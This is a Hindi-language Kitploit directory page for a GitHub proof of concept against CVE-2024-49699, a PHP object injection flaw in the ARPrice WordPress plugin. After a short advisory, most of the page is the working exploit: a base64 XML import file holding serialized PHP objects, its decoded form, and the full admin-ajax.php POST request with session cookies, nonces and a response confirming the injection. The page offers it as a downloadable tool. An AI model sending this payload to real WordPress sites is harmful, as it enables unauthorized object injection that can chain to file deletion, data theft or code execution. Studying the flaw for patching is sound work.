Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-49699 — ARPrice <= 4.0.3 - प्रमाणित (Subscriber+) PHP ऑब्जेक्ट इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-49699
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubrandomrobbiebf/cve-2024-49699

CVE-2024-49699

ARPrice <= 4.0.3 - प्रमाणित (Subscriber+) PHP ऑब्जेक्ट इंजेक्शन

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-49699

ARPrice <= 4.0.3 - प्रमाणित (सब्सक्राइबर+) PHP Object Injection

विवरण

WordPress के लिए ARPrice प्लगइन, संस्करण 4.0.3 तक (और 4.0.3 सहित), अविश्वसनीय इनपुट के deserialization के माध्यम से PHP Object Injection के प्रति संवेदनशील है। यह प्रमाणित हमलावरों को, subscriber-स्तरीय पहुंच और उससे ऊपर, PHP Object इंजेक्ट करने में सक्षम बनाता है। कमजोर सॉफ़्टवेयर में कोई ज्ञात POP chain मौजूद नहीं है। यदि लक्ष्य सिस्टम पर स्थापित किसी अतिरिक्त प्लगइन या थीम के माध्यम से POP chain मौजूद है, तो यह हमलावर को मनमानी फ़ाइलें हटाने, संवेदनशील डेटा प्राप्त करने, या कोड निष्पादित करने की अनुमति दे सकता है।

विवरण

  • प्रकार: प्लगइन
  • Slug: arprice
  • प्रभावित संस्करण: 4.0.3
  • CVSS स्कोर: 8.8
  • CVSS रेटिंग: उच्च
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-49699
  • स्थिति: निजी

POC

मैंने फ़ाइल यहाँ रखी: /wp-content/uploads/arprice-responsive-pricing-table/import/poc.txt

Poc.txt

root@kitploit:~
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPGFycGxpdGU+CiAgICA8YXJwbGl0ZV90YWJsZSBpZD0nMSc+CiAgICAgICAgPG9wdGlvbnM+CiAgICAgICAgICAgIDxnZW5lcmFsX29wdGlvbnM+PCFbQ0RBVEFbTzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e31dXT48L2dlbmVyYWxfb3B0aW9ucz4KICAgICAgICAgICAgPGNvbHVtbl9vcHRpb25zPjwhW0NEQVRBW086MjA6IlBIUF9PYmplY3RfSW5qZWN0aW9uIjowOnt9XV0+PC9jb2x1bW5fb3B0aW9ucz4KICAgICAgICA8L29wdGlvbnM+CiAgICA8L2FycGxpdGVfdGFibGU+CjwvYXJwbGl0ZT4=

डिकोडेड

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<arplite>
    <arplite_table id='1'>
        <options>
            <general_options><![CDATA[O:20:"PHP_Object_Injection":0:{}]]></general_options>
            <column_options><![CDATA[O:20:"PHP_Object_Injection":0:{}]]></column_options>
        </options>
    </arplite_table>
</arplite>

अनुरोध

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1736696295%7CjAeKDqFot3EeJ17OqJbVzJnV8BAbAh9l4SucPowT1Tj%7C7b37d87091ff9857d79cb643cca70d5b104da43d2032a71f9dfd0e6f967bc09b; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1736265454; wp_woocommerce_session_738b26438442006baf5dc1367e0c0fd7=1%7C%7C1736588413%7C%7C1736584813%7C%7C62d25bef9812be1675d63240f6e61152; woomotiv_seen_custompop_738b26438442006baf5dc1367e0c0fd7=1; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1736696295%7CjAeKDqFot3EeJ17OqJbVzJnV8BAbAh9l4SucPowT1Tj%7C4da3279a0630eb32fc7fc4e6e43c29a6797098fed0465fd7cf95ec0b0b505610; tk_ai=PP4UeTX8BFt0i2mAbFY8KcJ%2F; mailpoet_page_view=%7B%22timestamp%22%3A1736525567%7D; PHPSESSID=kkpth7p1v53nnequesoutenggb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-admin/admin.php?page=arprice_import_export&arprice_import_export_nonce=caee87fa42
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Origin: https://wp-dev.ddev.site
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

action=arplite_import_table&xml_file=poc&_wpnonce_arplite=4c81eaee40

प्रतिक्रिया

root@kitploit:~
PHP object injection has occurred.
टूल डाउनलोड करें